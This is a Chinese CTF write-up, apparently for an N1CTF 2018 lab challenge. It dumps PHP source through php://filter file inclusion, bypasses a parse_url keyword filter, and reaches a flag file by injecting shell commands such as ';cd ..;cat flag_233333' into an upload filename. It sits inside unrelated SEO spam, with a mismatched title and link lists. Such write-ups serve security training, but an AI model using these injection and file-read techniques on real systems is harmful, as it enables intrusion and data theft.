当前位置: 首页 > news >正文

网站美化工具推广方案应该有哪些方面

news 2025/11/5 16:43:02
网站美化工具,推广方案应该有哪些方面,南京网站建设雷仁网络,wordpress中英文一个cms,先打开环境试了一下弱口令,无效,再试一下万能密码,告诉我有waf,先不想怎么绕过,直接开扫(信息收集)访问register.php注册一个账号进行登录上面的链接尝试用php读文件http://…

一个cms,先打开环境

试了一下弱口令,无效,再试一下万能密码,告诉我有waf,先不想怎么绕过,直接开扫(信息收集)

访问register.php注册一个账号进行登录

上面的链接尝试用php读文件

http://575579bc-af3b-4fa5-b93d-9062dfb85a31.node4.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=index

index.php

<?php
require_once "function.php";
if(isset($_SESSION['login'] )){Header("Location: user.php?page=info");
}
else{include "templates/index.html";
}
?>

register.php

<?php
require_once "function.php";
if($_POST['action'] === 'register'){if (isset($_POST['username']) and isset($_POST['password'])){$user = $_POST['username'];$pass = $_POST['password'];$res = register($user,$pass);if($res){Header("Location: index.php");}else{$errmsg = "Username has been registered!";}}else{Header("Location: error_parameter.php");}
}
if (!$_SESSION['login']) {include "templates/register.html";
} else {Header("Location : user.php?page=info");
}?>

function.php

<?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>

config.php

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){echo "no sql connection".mysqli_connect_error();$mysqli=null;die();
}
?>

hacker.php

<?phpinclude("templates/hacker.html");
?>

user.php

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

login.php

<?php
require_once "function.php";
if($_POST['action'] === 'login'){if (isset($_POST['username']) and isset($_POST['password'])){$user = $_POST['username'];$pass = $_POST['password'];$res = login($user,$pass);if(!$res){Header("Location: index.php");}else{Header("Location: user.php?page=info");}}else{Header("Location: error_parameter.php");}
}else if($_REQUEST['action'] === 'logout'){logout();
}else{Header("Location: error_parameter.php");
}?>

error_parameter.php

<?phpinclude("templates/hacker2.html");
?>

到此为止,把能读的源码全读了,开始代码分析

看到有parse_url函数,可能存在漏洞

利用该漏洞的payload

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}else {echo "you can find sth in m4aaannngggeee";
}
?>

继续读取m4aaannngggeee(后续有用)

<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";?>

访问

http://xxxd1.no.buoj.cn:81/templates/upload.html

发现一个上传界面,随机上传一个文件,显示错误,看到upllloadddd,读它源码

upllloadddd.php(该界面访问报错,不是真正的上传界面)

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){die("error:can not move");}
}else{die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>

m4aaannngggeee(上面代码可以看出是上传界面)

http://xxx.nod4.bj.cn:81/user.php?page=m4aaannngggeee

然而这个上传界面没啥用,上传上去的代码被base64编码,无法解析

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename."

可以看到这一行有一个system函数,我们可以对filename传参利用

打开bp抓包,对filename进行操作

payload为

;l's'

发现传回的值明显多于原图片内容base64后的结果

解码查看内容

发现此为命令执行后的结果,找寻flag,查看上级目录

payload

;cd ..;l's'

读取flag_233333

payload

;cd ..;cat flag_233333

找到flag值

flag{44794dcf-7ec4-4dd2-8f68-c6ad9219f0ef}

http://www.yayakq.cn/news/697426/

相关文章:

  • 浙江城乡建设网站证件查询wordpress 自动发卡
  • 建设网站如何选择服务器做爰在线网站
  • 苏州网站开发建设电话从网站栏目看网站功能
  • 如何做自己的博客网站网站建设几个要素
  • 商城网站模板建设建设一个手机网站需要多少钱
  • 高端的饰品行业网站开发个人网站建设方案书 学生
  • 广州中英文网站建设响应式网页设计和自适应网页区别
  • 海口建设网站的公司哪家好深圳网站建设seo
  • 普通电脑怎么建设网站图书网站建设方案
  • 搜书网站 怎么做网站建设用哪个好
  • 装修设计效果图怎么收费西安seo排名收费
  • 用php制作一个个人信息网站wordpress网站打开速度慢
  • 深圳网站建设公司平台flash网站制作实例
  • 永久免费自动建站淘宝联盟的网站怎么做
  • 哪个网站可以专门做超链接万网域名续费查询
  • 网站建设比较牛的企业有没有做网站的联系方式
  • 辛集seo网站优化电话合肥网站设计 goz
  • 备案网站负责人php做网站目录结构
  • 漳州网站设计制作网站建设开源
  • 做 在线观看免费网站本网站三天换一次域名
  • 响应式网站建设服务深圳品牌家政公司排行榜
  • 网站开发建设流程可以自己做头像的网站
  • 龙岗同乐社区做网站开发公司网站公司
  • 郑州知名做网站公司青岛做公司网站的多吗
  • 南京网站制作设计公司微信网站制作价格
  • 湖北省住房部城乡建设厅网站电商营销策略方案
  • 管理信息系统网站建设网站建设描述书
  • 做企业网站注意什么百度关键词推广帝搜软件
  • php帝国建站系统龙岗网站建设设计服务
  • 深圳住房和建设局网站 招标广州做地铁的公司网站